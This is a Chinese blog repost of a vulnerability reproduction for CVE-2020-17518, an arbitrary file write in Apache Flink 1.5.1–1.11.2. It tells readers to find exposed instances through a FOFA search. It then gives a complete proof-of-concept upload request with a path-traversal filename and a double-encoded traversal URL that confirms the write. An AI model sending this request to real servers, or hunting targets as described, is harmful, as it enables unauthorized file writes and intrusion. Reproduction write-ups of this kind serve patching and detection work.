CVE-2020-17518 Apache Flink任意文件写入漏洞

admin

102714
文章

87
评论

2023年5月18日09:42:12评论28 views字数 858阅读2分51秒阅读模式

漏洞环境

FOFA搜app="Apache-Flink"

漏洞危害

攻击者可以通过恶意修改HTTP头写入文件到本地系统任意位置，从而实现任意文件写入。

影响范围

Apache Flink 1.5.1 - 1.11.2

漏洞复现

通过FOFA收集目标站点

CVE-2020-17518 Apache Flink任意文件写入漏洞

构造poc 只需要修改下面请求包内的ip地址即可

POST /jars/upload HTTP/1.1Host: x.x.x.xAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6YContent-Length: 187 ------WebKitFormBoundaryoZ8meKnrrso89R6YContent-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success" success------WebKitFormBoundaryoZ8meKnrrso89R6Y--

在目标服务器上的tmp目录下新建一个success文件内容为success

CVE-2020-17518 Apache Flink任意文件写入漏洞

写入成功

https://x.x.x.x/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

CVE-2020-17518 Apache Flink任意文件写入漏洞

原文始发于微信公众号（赛瑞攻防实验室）：CVE-2020-17518 Apache Flink任意文件写入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2020-17518 Apache Flink任意文件写入漏洞

漏洞环境

漏洞危害

影响范围

漏洞复现

Hackerone 附件功能存在IDOR越权漏洞15000$

从环境搭建到内网渗透靶机

漏洞挖掘之某厂商OAuth2.0认证缺陷

大家喜欢看打击违法犯罪？新鲜的挖矿后台逻辑绕过放在这了

支付漏洞实现0元购

【開山安全笔记】WAF略知一二

R语言中的新漏洞可导致项目易受供应链攻击

从未授权使用破解软件到VenomRAT木马的应急响应

【红蓝/演练】-事前准备(6)之互联网风险收敛

如何利用关键 Ray 框架漏洞来入侵全球 AI 机器？

发表评论

在线咨询

微信